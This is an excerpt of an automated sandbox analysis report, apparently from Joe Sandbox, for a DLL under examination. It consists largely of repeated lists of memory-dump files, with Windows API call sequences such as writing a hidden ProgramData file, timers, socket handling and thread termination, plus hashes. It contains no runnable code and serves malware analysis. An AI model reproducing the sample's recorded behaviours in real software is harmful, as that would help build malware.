                              • Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: CriticalSection$Enter$Leave$H_prolog
                              • String ID:
                              • API String ID: 3611688910-0
                              • Opcode ID: 7366b7195f324ab2daa9e57fe15bd3deeb93be7a5b4eb90135a5a7bfc46fc371
                              • Instruction ID: 4fa28eeb552a8aacd68c47d74ec23e43bb14200c390594fab8cb8d625228390f
                              • Opcode Fuzzy Hash: 7366b7195f324ab2daa9e57fe15bd3deeb93be7a5b4eb90135a5a7bfc46fc371
                              • Instruction Fuzzy Hash: 5491A0B5C0121DAACF11DBE0CE85BFEB778AF15308F20015AE515B3640EB785A4ECBA1

                              Control-flow Graph

                              APIs
                              • SHGetSpecialFolderPathW.SHELL32(00000000,6CEB6BCB,00000023,00000000,?,?,?,?,?,?,6CEB6BCB,?), ref: 6CEB66F1
                              • lstrcpyW.KERNEL32(C:\ProgramData\rc.dat,6CEB6BCB,?,?,?,?,?,?,6CEB6BCB,?), ref: 6CEB66FF
                              • lstrcatW.KERNEL32(C:\ProgramData\rc.dat,\ts.dat,?,?,?,?,?,?,6CEB6BCB,?), ref: 6CEB670F
                              • CreateFileW.KERNELBASE(C:\ProgramData\rc.dat,80000000,00000000,00000000,00000003,00000020,00000000,?,?,?,?,?,?,6CEB6BCB,?), ref: 6CEB6729
                              • ReadFile.KERNELBASE(000000FF,?,00000008,?,00000000,?,?,?,?,?,?,6CEB6BCB), ref: 6CEB6747
                              • CloseHandle.KERNELBASE(000000FF,?,?,?,?,?,?,6CEB6BCB), ref: 6CEB6750
                                • Part of subcall function 6CEB60CA: _malloc.LIBCMT ref: 6CEB60DE
                              • CreateFileW.KERNEL32(C:\ProgramData\rc.dat,40000000,00000000,00000000,00000002,00000022,00000000,?,?,?,?,?,?,6CEB6BCB), ref: 6CEB6793
                              • WriteFile.KERNEL32(000000FF,?,00000008,?,00000000,?,?,?,?,?,?,6CEB6BCB), ref: 6CEB67B1
                              • CloseHandle.KERNEL32(000000FF,?,?,?,?,?,?,6CEB6BCB), ref: 6CEB67BA
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true
                              • Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$CloseCreateHandle$FolderPathReadSpecialWrite_malloclstrcatlstrcpy
                              • String ID: C:\ProgramData\rc.dat$\ts.dat
                              • API String ID: 2169994954-2903805982
                              • Opcode ID: 68739f70d899f97a76c7cff930f842e8e42ade5370f34219789ee90bb9df455f
                              • Instruction ID: 3dbbd8d8f77b30ce77bde4d6e8ad9d3b19a60e5bb093598c30239a85698fdf1b
                              • Opcode Fuzzy Hash: 68739f70d899f97a76c7cff930f842e8e42ade5370f34219789ee90bb9df455f
                              • Instruction Fuzzy Hash: 8E118C76680208FBEB94DBE0CD0AFAD7B38EB09744F204554F721FA5D0DA7156019B11

                              Control-flow Graph

                              APIs
                              • InterlockedExchange.KERNEL32(?,00000001), ref: 6CEB2508
                              • SetWaitableTimer.KERNELBASE(?,?,00000001,00000000,00000000,00000000), ref: 6CEB2539
                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 6CEB2544
                              • GetQueuedCompletionStatus.KERNEL32(?,?,?,000001F4,000001F4,?), ref: 6CEB25B3
                              • InterlockedDecrement.KERNEL32(?), ref: 6CEB25C0
                              • InterlockedDecrement.KERNEL32(?), ref: 6CEB25DB
                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 6CEB2607
                              Memory Dump Source
                              • Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true
                              • Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Interlocked$Exchange$Decrement$CompletionQueuedStatusTimerWaitable
                              • String ID:
                              • API String ID: 1171374749-0
                              • Opcode ID: 1f724e57d7c94a5f6688032d3ee13f680fc1a80973b2078fd825343153bbb10b
                              • Instruction ID: 0fd6d35e9bac2626094c0a621242671425161903d3f7cd3e6e6e0dec4a9f6765
                              • Opcode Fuzzy Hash: 1f724e57d7c94a5f6688032d3ee13f680fc1a80973b2078fd825343153bbb10b
                              • Instruction Fuzzy Hash: 18414C711047429FC710DF21CA9896BB7F8FF99758F100A2EB496A3790DB34EA09CB52

                              Control-flow Graph

                              APIs
                              • __EH_prolog.LIBCMT ref: 6CEB2AD2
                              • CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 6CEB2B04
                              • GetLastError.KERNEL32 ref: 6CEB2B11
                                • Part of subcall function 6CEB1A0E: __EH_prolog.LIBCMT ref: 6CEB1A13
                              • SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 6CEB2B4B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true
                              • Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: H_prologTimerWaitable$CreateErrorLast
                              • String ID: timer
                              • API String ID: 1421927452-1792073242
                              • Opcode ID: 5c06ab03ce291bc743774ea213a9363152af039ef7beb8ce997da37622310349
                              • Instruction ID: 9283567fd885c832f03458ca249dbc1a3efa8866c541dcc90a612511561ae611
                              • Opcode Fuzzy Hash: 5c06ab03ce291bc743774ea213a9363152af039ef7beb8ce997da37622310349
                              • Instruction Fuzzy Hash: BF2137B1A0060AEFDB04DFB5C9859AEF778FF15358B20416EE515A7B40DB309E05CBA1

                              Control-flow Graph

                              APIs
                              • WSASetLastError.WS2_32(00000000,?,6CEF14BC,?,?,00000000,00000000), ref: 6CEB2FBD
                              • closesocket.WS2_32(?), ref: 6CEB2FC5
                              • ioctlsocket.WS2_32(?,8004667E,00000000), ref: 6CEB3023
                              • WSASetLastError.WS2_32(00000000), ref: 6CEB3031
                              • closesocket.WS2_32(?), ref: 6CEB3039
                              Memory Dump Source
                              • Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true
                              • Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorLastclosesocket$ioctlsocket
                              • String ID:
                              • API String ID: 1561005644-0
                              • Opcode ID: e661a85db928f8a584ceb6c8f27d353ed260694d2c4b5ad4929bd07e50557eef
                              • Instruction ID: 762155818a59ec080967556467004fb9f36ab9940a0485ffb766afa995c7467c
                              • Opcode Fuzzy Hash: e661a85db928f8a584ceb6c8f27d353ed260694d2c4b5ad4929bd07e50557eef
                              • Instruction Fuzzy Hash: 8F31B372A00608AFDB00DBA5CD85BBEB7B9EF04328F300559F525E7681DB34A904CB50

                              Control-flow Graph

                              APIs
                              • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 6CEB203B
                              • CloseHandle.KERNEL32(?), ref: 6CEB2044
                                • Part of subcall function 6CEB8CEA: InterlockedExchangeAdd.KERNEL32(6CEF14D4,00000000), ref: 6CEB8CF5
                              • TerminateThread.KERNEL32(?,00000000), ref: 6CEB2058
                              • QueueUserAPC.KERNELBASE(Function_00001631,?,00000000), ref: 6CEB2065
                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6CEB2070
                              Memory Dump Source
                              • Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true
                              • Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
